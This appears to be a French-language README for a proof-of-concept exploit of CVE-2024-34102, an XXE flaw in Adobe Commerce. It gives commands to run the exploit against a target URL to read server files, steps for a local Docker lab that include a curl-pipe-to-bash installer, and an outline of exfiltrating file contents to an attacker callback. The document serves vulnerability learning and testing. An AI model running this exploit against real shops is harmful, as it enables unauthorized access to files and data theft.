
Adobe Commerce XXE exploit
★ Merci à @th3gokul, Sanjaith3hacker, Chocapikk pour le code source original. ★
CVE-2024-34102 : Vulnérabilité XXE d'Adobe Commerce description : Les versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 et antérieures d'Adobe Commerce sont affectées par une vulnérabilité de restriction inappropriée des références d'entités externes XML (XXE) qui pourrait entraîner une exécution de code arbitraire. Un attaquant pourrait exploiter cette vulnérabilité en envoyant un document XML malveillant qui référence des entités externes. L'exploitation de ce problème ne nécessite pas d'interaction de l'utilisateur.
git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102
pip install -r requirements.txt
python CVE-2024-34102.py -u <URL_TO_EXPLOIT> -f <FILE_TO_READ>
python CVE-2024-34102.py https://magento.test -f /etc/hosts

Grâce à la configuration Docker de markshust pour Magento, il n'est pas difficile de créer l'environnement de développement vulnérable. https://github.com/markshust/docker-magento
# Create your project directory then go into it:
mkdir /opt/magento
cd $_
# Install some stuff (needed for the script)
sudo apt update
sudo apt install -y bc curl
# Create Composer's directory (to avoid a weird error)
mkdir /var/www/.composer/
# Run this automated one-liner from the directory you want to install your project.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Submit credentials when needed.
# Edit hosts file
echo "127.0.0.1 magento.test" >> /etc/hosts

Vous pouvez déboguer votre Magento en utilisant PHPSTORM.
bin/xdebug enable

..Et ensuite vous pouvez déboguer votre Magento.
Créez une URL de callback (mocky api) -> Attaque XXE aveugle (CVE-2024-34102) -> Envoyez le contenu du fichier à l'instance de l'attaquant (SSRFUtility) -> Lisez l'instance de l'attaquant (SSRFUtility)
Ce dépôt n'est pas destiné à être un exploit XXE pour CVE-2024-34102. Le but de ce projet est d'aider les gens à en apprendre davantage sur cette vulnérabilité, et peut-être à tester leurs propres applications.
Nous publions des analyses de CVE et de logiciels malveillants une fois par mois. Si cela vous intéresse, veuillez suivre les liens ci-dessous pour consulter nos publications. https://www.skshieldus.com/eng/business/insight.do